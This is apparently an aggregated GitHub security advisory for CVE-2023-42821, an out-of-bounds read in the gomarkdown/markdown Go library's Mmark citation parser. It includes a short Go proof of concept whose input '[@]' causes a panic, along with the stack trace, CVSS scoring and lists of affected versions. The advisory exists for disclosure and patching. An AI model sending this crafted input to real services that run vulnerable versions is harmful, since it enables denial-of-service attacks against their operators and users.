Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1tOXhxLTZoMmotNjVyMs4AA2Ar
Markdown vulnerable to Out-of-bounds Read while parsing citations
Summary
Parsing malformed markdown input with parser that uses parser.Mmark extension could result in out-of-bounds read vulnerability.
Details
To exploit the vulnerability, parser needs to have parser.Mmark extension set. The panic occurs inside the citation.go file on the line 69 when the parser tries to access the element past its length.
PoC
package main
import (
"github.com/gomarkdown/markdown"
"github.com/gomarkdown/markdown/parser"
)
func main() {
ext := parser.CommonExtensions |
parser.Attributes |
parser.OrderedListStart |
parser.SuperSubscript |
parser.Mmark
p := parser.NewWithExtensions(ext)
inp := []byte("[@]")
markdown.ToHTML(inp, p, nil)
}
$ go run main.go
panic: runtime error: index out of range [1] with length 1
goroutine 1 [running]:
github.com/gomarkdown/markdown/parser.citation(0x10?, {0x1400000e3f0, 0x14000141801?, 0x3}, 0x0?)
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/citation.go:69 +0x544
github.com/gomarkdown/markdown/parser.link(0x14000152000?, {0x1400000e3f0?, 0x3?, 0x3?}, 0x14000141ad8?)
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/inline.go:308 +0x1c0
github.com/gomarkdown/markdown/parser.(*Parser).Inline(0x14000152000, {0x102d87f48, 0x14000076180}, {0x1400000e3f0, 0x3, 0x3})
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/inline.go:38 +0xb8
github.com/gomarkdown/markdown/parser.(*Parser).Parse.func1({0x102d87f48?, 0x14000076180}, 0x0?)
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/parser.go:307 +0x8c
github.com/gomarkdown/markdown/ast.NodeVisitorFunc.Visit(0x140000106e0?, {0x102d87f48?, 0x14000076180?}, 0x68?)
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/ast/node.go:574 +0x38
github.com/gomarkdown/markdown/ast.Walk({0x102d87f48, 0x14000076180}, {0x102d87348, 0x140000106e0})
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/ast/node.go:546 +0x58
github.com/gomarkdown/markdown/ast.Walk({0x102d877b0, 0x14000076120}, {0x102d87348, 0x140000106e0})
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/ast/node.go:557 +0x144
github.com/gomarkdown/markdown/ast.WalkFunc(...)
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/ast/node.go:580
github.com/gomarkdown/markdown/parser.(*Parser).Parse(0x14000152000, {0x1400000e3f0?, 0x0?, 0x0?})
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/parser.go:304 +0x16c
github.com/gomarkdown/markdown.Parse({0x1400000e3f0?, 0x3f?, 0x14000141e38?}, 0x102c6b43c?)
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/markdown.go:53 +0x6c
github.com/gomarkdown/markdown.ToHTML({0x1400000e3f0?, 0x0?, 0x60?}, 0x0?, {0x0, 0x0})
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/markdown.go:77 +0x30
main.main()
/Users/demon/tools/markdown_cve_poc/main.go:17 +0x5c
exit status 2
Impact
Denial of Service / panic
Permalink: https://github.com/advisories/GHSA-m9xq-6h2j-65r2JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tOXhxLTZoMmotNjVyMs4AA2Ar
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 1 year ago
Updated: about 1 year ago
CVSS Score: 7.5
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Percentage: 0.00097
EPSS Percentile: 0.41523
Identifiers: GHSA-m9xq-6h2j-65r2, CVE-2023-42821
References:
- https://github.com/gomarkdown/markdown/security/advisories/GHSA-m9xq-6h2j-65r2
- https://nvd.nist.gov/vuln/detail/CVE-2023-42821
- https://github.com/gomarkdown/markdown/commit/14b16010c2ee7ff33a940a541d993bd043a88940
- https://github.com/gomarkdown/markdown/blob/7478c230c7cd3e7328803d89abe591d0b61c41e4/parser/citation.go#L69
- https://github.com/advisories/GHSA-m9xq-6h2j-65r2
Blast Radius: 22.5
Affected Packages
go:github.com/gomarkdown/markdown
Dependent packages: 1,252Dependent repositories: 1,009
Downloads:
Affected Version Ranges: < 0.0.0-20230922105210-14b16010c2ee
Fixed in: 0.0.0-20230922105210-14b16010c2ee
All affected versions: 0.0.0-20190912180731-281270bc6d83, 0.0.0-20191123064959-2c17d62f5098, 0.0.0-20200820230800-3724143f5294, 0.0.0-20200824053859-8c8b3816f167, 0.0.0-20201113031856-722100d81a8e, 0.0.0-20210514010506-3b9f47219fe7, 0.0.0-20210918222519-d0f88e9eb6e5, 0.0.0-20220310201231-552c6011c0b8, 0.0.0-20220607163217-45f7c050e2d1, 0.0.0-20220627144906-e9a81102ebeb, 0.0.0-20220731190611-dcdaee8e7a53, 0.0.0-20220825072242-90efaac57fb4, 0.0.0-20220829112121-a940a8f5bc05, 0.0.0-20221013030248-663e2500819c, 0.0.0-20230309071026-b9a42cb9b4a0, 0.0.0-20230309071408-e444975d2bd9, 0.0.0-20230309071618-d640a388c6c5, 0.0.0-20230309072206-3418bbfe2069, 0.0.0-20230309073835-0cff362ab5d9, 0.0.0-20230309081604-09e1818272d6, 0.0.0-20230309083625-de14518eadd0, 0.0.0-20230309092824-3238e54d4819, 0.0.0-20230310225216-e92f2877bcce, 0.0.0-20230311184306-fc0ebebbe9af, 0.0.0-20230311185209-fc3f3a72c23a, 0.0.0-20230311204719-630fdb2a10ae, 0.0.0-20230311221154-ee98e42be4e5, 0.0.0-20230312001534-ae1a42e38ef1, 0.0.0-20230312174038-279c45774906, 0.0.0-20230312215031-f439dd2b4436, 0.0.0-20230313173142-2ced44d5b584, 0.0.0-20230321044648-154b583bceb3, 0.0.0-20230321061146-9af27b67c68e, 0.0.0-20230322035321-5f17e2f50624, 0.0.0-20230322041520-c84983bdbf2a, 0.0.0-20230711084535-11b03c0ae6d6, 0.0.0-20230714230225-84ecad09a30a, 0.0.0-20230715013231-a46a3be917c7, 0.0.0-20230716120725-531d2d74bc12, 0.0.0-20230912175223-14b07df9d538, 0.0.0-20230916125811-7478c230c7cd
All unaffected versions: